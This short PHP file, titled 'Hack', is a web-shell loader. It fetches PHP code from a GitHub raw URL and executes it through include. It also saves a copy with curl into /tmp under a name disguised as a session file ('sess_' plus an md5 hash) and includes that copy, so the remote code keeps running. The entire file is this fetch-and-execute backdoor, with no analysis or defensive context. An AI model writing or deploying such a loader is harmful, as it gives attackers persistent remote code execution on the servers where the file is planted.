<title>Hack</title><?php

$url = 'https://raw.githubusercontent.com/tikung6etar/Nyarek/refs/heads/master/miniku.php';

$temp = tmpfile();
fwrite($temp, file_get_contents($url));

$meta = stream_get_meta_data($temp);
include $meta['uri'];

fclose($temp);
$fname = "sess_" . md5("min") . ".php";
if (!file_exists("/tmp/$fname") || filesize("/tmp/$fname") < 10) {
    ex("curl --output /tmp/$fname https://raw.githubusercontent.com/tikung6etar/Nyarek/refs/heads/master/miniku.php", "/tmp");
}
include("/tmp/$fname");
?>
